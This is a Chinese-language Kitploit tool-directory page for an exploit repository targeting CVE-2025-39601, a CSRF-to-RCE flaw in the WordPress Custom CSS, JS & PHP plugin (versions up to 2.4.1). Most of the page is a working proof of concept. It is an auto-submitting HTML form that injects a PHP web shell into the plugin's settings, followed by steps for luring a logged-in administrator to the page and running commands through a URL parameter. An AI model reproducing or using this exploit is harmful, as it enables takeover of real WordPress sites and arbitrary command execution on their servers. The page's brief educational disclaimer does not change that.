Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-39601 — WordPress 自定义 CSS、JS 和 PHP 插件 <= 2.4.1 - CSRF 到 RCE 漏洞 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-39601
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHubnxploited/cve-2025-39601

CVE-2025-39601

WordPress 自定义 CSS、JS 和 PHP 插件 <= 2.4.1 - CSRF 到 RCE 漏洞

查看仓库
151年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 CVE-2025-39601 - WordPress Custom CSS, JS & PHP 插件 <= 2.4.1 中的 CSRF 到 RCE 漏洞

🧠 描述

WPFactory Custom CSS, JS & PHP 插件中存在一个跨站请求伪造 (CSRF) 漏洞,允许通过未授权的 POST 请求注入恶意 PHP 代码,从而实现远程代码执行 (RCE)。
此漏洞影响所有版本 2.4.1 及以下。

  • CVE ID: CVE-2025-39601
  • 发布时间: 2025-04-16
  • 更新日期: 2025-04-16
  • 严重程度: 🔥 9.6 (严重)
  • CWE: CWE-352 - 跨站请求伪造
  • CVSS 向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🖼️ 视觉证明

以下截图展示了成功利用的结果,演示了如何通过 URL 参数执行远程代码:

Nxploited


Nxploited


💥 概念验证 (PoC)

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
    <h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
    <p>By : Nxploited | Khaled Alenazi</p>
    <form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
        <input type="hidden" name="alg_custom_css_php_enabled" value="1">
        <input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
        <input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
        <input type="hidden" name="alg_ccjp_submit" value="php">
        <noscript><input type="submit" value="Submit"></noscript>
    </form>
</body>
</html>

🧪 使用说明

  1. 将上述 HTML 文件托管在任何外部服务器或本地环境中。
  2. 在管理员用户已登录的状态下,让该管理员在浏览器中访问托管的 HTML 文件。
  3. 这将静默提交表单,并将 PHP 代码注入插件设置中。
  4. 随后,该代码会通过 plugins_loaded 钩子在每次页面加载时自动执行。
  5. 执行示例:
    root@kitploit:~
    http://target-site.com/?cmd=whoami
    

⚠️ 免责声明

此 PoC 仅用于教育目的。
作者对不当使用此信息所造成的任何滥用或损害概不负责。
请始终在受控环境中并获得授权后再进行测试。


作者: Nxploited | Khaled Alenazi

下载工具